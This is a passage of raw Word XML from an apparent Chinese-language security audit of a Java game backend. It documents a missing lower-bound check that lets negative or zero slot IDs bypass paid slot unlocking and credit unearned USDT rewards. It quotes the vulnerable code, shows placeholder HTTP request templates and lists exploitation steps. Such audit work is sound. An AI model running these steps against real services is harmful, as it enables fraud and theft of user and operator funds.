              <w:t xml:space="preserve">    .map(u -&gt; u.getIsUnlocked() != null &amp;&amp; u.getIsUnlocked() == 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElse(false);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 算力重算：MinerService.java#recalcUserLevelAndHashRate</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0); // ← 无差别拉取所有 inStorage=0 矿机，含负数坑位矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxLevel = miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0); // ← 负数坑位的高级矿机参与 maxLevel 计算</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int oldLevel = u.getCurrentLevel() != null ? u.getCurrentLevel() : 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int userNewLevel = Math.max(maxLevel, oldLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentLevel(userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userRepository.save(u);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) { // ← 高级矿机通过负数坑位激活后触发升级</w:t>
              <w:br/>
              <w:t xml:space="preserve">            grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel); // ← 向账户增加 USDT</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ⑤ USDT 发放：MinerService.java#grantUsdtOnLevelUp</w:t>
              <w:br/>
              <w:t>private void grantUsdtOnLevelUp(Long userId, int fromLevel, int toLevel) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserId(userId).orElse(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int level = fromLevel; level &lt;= toLevel; level++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        BigDecimal amt = usdtLevelConfigRepository.findByRegionIdAndLevel(regionId, level)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .map(UsdtLevelConfig::getEstimatedUsdt)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .filter(a -&gt; a != null &amp;&amp; a.compareTo(BigDecimal.ZERO) &gt; 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .orElse(BigDecimal.ZERO);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        total = total.add(amt);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (total.c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ompareTo(BigDecimal.ZERO) &gt; 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setUsdtBalance(account.getUsdtBalance().add(total)); // ← 直接增加 USDT 余额，无二次校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setUsdtTotalBalance(account.getUsdtTotalBalance().add(total));</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userAccountRepository.save(account); // ← 持久化写入，资金变动完成</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Step 1 - 使用负数坑位激活仓库中的高级矿机（所有6个正常坑位已占满时）：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&lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按照 SignAuthTestFilter 要求生成的签名&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerId": &lt;攻击者仓库中高级矿机ID&gt;, "targetSlotId": 0}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2 - 继续使用不同的负数坑位激活更多矿机，不受坑位数量限制：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&lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;签名&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;新nonce&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerId": &lt;另一个仓库中矿机ID&gt;, "targetSlotId": -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者持有已登录账号，账号内有多台矿机（包含若干高等级矿机存于仓库）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>将6个正常坑位（1-6）全部填满矿机（正常使用），此时仓库中仍剩余高等级矿机；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的请求，将仓库中高等级矿机放入坑位0——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0 &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判定为"已解锁"，坑位占用检查通过（坑位0初始为空），矿机以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0, slotId=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入数据库；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被触发，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 拉取到7台激活矿机（含坑位0的高级矿机），计算出更高的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>maxLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若该高级矿机等级超过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将差额等级的 USDT 奖励直接累加到账户；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">重复步骤3，使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId=-1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……激活仓库中所有剩余矿机，可达到全部矿机同时在线（无数量上限）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">预期结果：账户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 增加对应等级奖励，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 远高于系统设计值，持续享受超额算力收益，坑位解锁付费机制完全失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="496"/>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（需要有效 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">权限级别：普通注册用户即可，无需管理员权限；需具备有效请求签名（若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>properties.isEnabled()=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；账户内需有矿机存于仓库。</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498"/>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MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp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audit_m152_520_takeFromStorage_ctrl-path4of6.md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：MinerService.java#isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_24" w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞23：业务逻辑缺陷 — isSlotUnlocked 下界校验缺失，负数/零坑位绕过槽位解锁限制并触发非授权 USDT 奖励</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="499"/>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：负数/零 slotId 绕过坑位解锁机制，借助 recalcUserLevelAndHashRate 非授权领取 USDT 等级奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="500"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="501"/>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资金安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="502"/>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503"/>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：普通已登录用户（需通过 TokenAuthFilter + SignAuthTestFilter 双重鉴权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="504"/>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isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对坑位 ID 仅做了上界语义判断 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>if (slotId &lt;= 6) return true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，未对下界（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）做任何校验。Java Integer 可为任意负数，导致：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId = 0</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等均满足 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，绕过解锁判断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">随后的占用检查 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorage(userId, targetSlotId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 只要对应"幽灵坑位"从未被占用即可通过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>矿机以非法 slotId 落库（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>miner.setSlotId(targetSlotId); userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="508"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">落库后 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时会把该矿机计入活跃矿机列表（因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若该矿机等级高于用户当前等级，则 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp(userId, oldLevel+1, userNewLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
